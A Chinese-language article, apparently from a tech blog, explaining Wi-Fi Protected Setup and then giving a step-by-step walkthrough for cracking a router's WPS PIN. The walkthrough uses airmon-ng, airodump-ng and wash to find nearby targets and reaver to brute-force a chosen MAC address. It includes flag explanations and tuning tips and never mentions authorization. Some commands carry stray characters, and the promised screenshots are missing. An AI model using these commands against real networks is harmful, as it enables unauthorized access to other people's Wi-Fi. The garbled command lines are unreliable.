技術(shù)解析:破解無線WIFI WPS認(rèn)證機(jī)制
1. WPS認(rèn)證機(jī)制
WPS(Wi-Fi Protected Setup,Wi-Fi保護(hù)設(shè)置)(有的叫做AOSS、有的叫做QSS,不過功能都一致。)是由Wi-Fi聯(lián)盟組織實(shí)施的認(rèn)證項(xiàng)目,主要致力于簡(jiǎn)化無線局域網(wǎng)的安裝及安全性能配置工作。在傳統(tǒng)方式下,用戶新建一個(gè)無線網(wǎng)絡(luò)時(shí),必須在接入點(diǎn)手動(dòng)設(shè)置網(wǎng)絡(luò)名(SSID)和安全密鑰,然后在客戶端驗(yàn)證密鑰以阻止“不速之客”的闖入。這整個(gè)過程需要用戶具備Wi-Fi設(shè)備的背景知識(shí)和修改必要配置的能力。Wi- Fi Protected Setup能幫助用戶自動(dòng)設(shè)置網(wǎng)絡(luò)名(SSID)、配置強(qiáng)大的WPA數(shù)據(jù)編碼及認(rèn)證功能,用戶只需輸入個(gè)人信息碼(PIN方法)或按下按鈕(按鈕設(shè)置,或稱PBC),即能安全地連入WLAN。這大大簡(jiǎn)化了無線安全設(shè)置的操作。Wi-Fi Protected Setup支持多種通過Wi-Fi認(rèn)證的802.11產(chǎn)品,包括接入點(diǎn)、無線適配器、Wi-Fi電話以及其他消費(fèi)性電子設(shè)備。
WPS可以幫助客戶端用戶自動(dòng)配置網(wǎng)絡(luò)名(SSID)及無線加密密鑰。對(duì)于普通用戶來說,無需了解SSID和安全密鑰的概念就能實(shí)現(xiàn)安全連接;而且用戶的安全密鑰不可能被外人破解,因?yàn)樗请S機(jī)產(chǎn)生的;最重要的是用戶無需記憶冗長(zhǎng)的無線加密密碼,避免了忘記密碼的麻煩。
wps認(rèn)證AP操作說明
1、在支持WPS的AP設(shè)備上一般會(huì)有一個(gè)按鈕,按下這個(gè)按鈕,在一定的時(shí)間內(nèi)(通常為120s)它會(huì)等待客戶設(shè)備連接。在網(wǎng)頁的管理界面也有對(duì)應(yīng)的操作,二者選其一即可。
2、按下網(wǎng)卡設(shè)備的WPS連接按鈕(有些是QSS、AOSS等)去連接AP。(也可輸入PIN碼連接,需要AP做對(duì)應(yīng)的設(shè)置)。
3、無線網(wǎng)卡和WPS認(rèn)證的AP建立起連接。
WPS連接操作如diagram-WPS圖示意
#p#
2. 連接WPS機(jī)制的WIFI 認(rèn)證過程
并非所有的手機(jī)型號(hào)和ROM支持WPS認(rèn)證的網(wǎng)絡(luò)連接,有些是支持的,以天語的K-touch w806(大黃蜂)為例,說一下手機(jī)連接WPS的相關(guān)操作。
在“設(shè)置”——“無線和網(wǎng)絡(luò)”——“wlan設(shè)置”下,有個(gè)添加WPS網(wǎng)絡(luò)的選項(xiàng),點(diǎn)擊會(huì)有兩個(gè)選項(xiàng)可選,分別為兩種接入方式,一種是輸入PIN碼,另一種是按鍵。
連接成功后,路由器(AP)管理頁面顯示如下:
用wireshark進(jìn)行分析。通過設(shè)置過濾,可以大致看到WPS認(rèn)證連接大體過程。
繪制成流程圖,大致過程如下:
#p#
3. WIFI密碼破解過程
打開終端 輸入 ifconfig wlan0 up” 加載usb網(wǎng)卡。
ifconfig wlan0 up
接下來“airmon-ng start wlan0” 監(jiān)聽模式已激活到了mon0。
airmon-ng start wlan0
注:wlan0并不一定是固定的,插入其他的usb網(wǎng)卡系統(tǒng)會(huì)自動(dòng)的以wlan1,wlan2等命名。usb網(wǎng)卡需要系統(tǒng)支持。推薦RTF8187系列,本人親測(cè)穩(wěn)定可用。
查看周邊路由AP的信息。記錄下你要學(xué)習(xí)的路由MAC地址。
airodump-ng mon0”1
特別提示:只有AP開啟了WPS、QSS功能,才可以用PIN法學(xué)習(xí)PSK密碼!
使用wash命令查看周圍無線wifi的屬性,C是大寫在wps locked一項(xiàng)中有顯示的
wash -i mon0 -C1
抓PIN包,枚舉PIN碼
reaver -i mon0 -b 目標(biāo)mac地址 -a -S -vv1
注意:
MAC地址中冒號(hào)不可省略,MAC地址的字母大小寫均可,-S是大寫字母, -vv
是兩個(gè)V不是W!
-i 監(jiān)聽后接口名稱
-b 目標(biāo)mac地址
-a 自動(dòng)檢測(cè)目標(biāo)AP***配置
-S 使用最小的DH key(可以提高PJ速度)
-vv 顯示更多的非嚴(yán)重警告
-d 即delay每窮舉一次的閑置時(shí)間 預(yù)設(shè)為1秒
-t 即timeout每次窮舉等待反饋的最長(zhǎng)時(shí)間
-c指定頻道可以方便找到信號(hào),如-c1 指定1頻道,大家查看自己的目標(biāo)頻道做相應(yīng)修改 (非TP-LINK路由推薦–d9 –t9參數(shù)防止路由僵死
reaver -i mon0 -b MAC -a -S –d9 –t9 -vv)。
剩下的就是漫長(zhǎng)的等待,要有耐心!!!
祝好!
